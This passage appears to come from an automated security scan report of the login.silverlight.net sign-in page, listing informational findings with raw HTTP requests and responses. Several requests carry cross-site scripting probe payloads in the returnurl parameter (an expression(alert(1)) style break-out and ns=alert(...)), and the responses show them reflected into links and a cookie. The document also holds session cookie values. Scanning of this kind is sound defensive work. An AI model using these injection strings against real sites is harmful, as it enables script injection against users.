Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:01:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:51:52 GMT
Content-Length: 15108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402712&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.159. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 26

renderableItem=%2Fshow%2F0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oskbdk551vwbxu55kiwfw5zm; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:59:12 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:49:11 GMT
Content-Length: 13452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406152&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406152&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406152&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.160. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:35:46 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:25:46 GMT
Content-Length: 15108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343546&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.161. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:45:01 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351901&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351901&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351901&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.162. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=%5B%5BB%5D%5D
Host: login.silverlight.net
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:32:41 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351161&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351161&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351161&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.163. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:51:30 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344490&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344490&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344490&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.164. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:41:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:31:51 GMT
Content-Length: 15108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296405111&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.165. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl
Host: login.silverlight.net
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:44:43 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351883&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351883&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351883&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.166. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=%5B%5BB%5D%5D
Host: login.silverlight.net
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:46:21 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351981&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351981&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351981&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.167. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Content-Length: 15108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343071&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.168. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=%5B%5BB%5D%5D
Host: login.silverlight.net
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
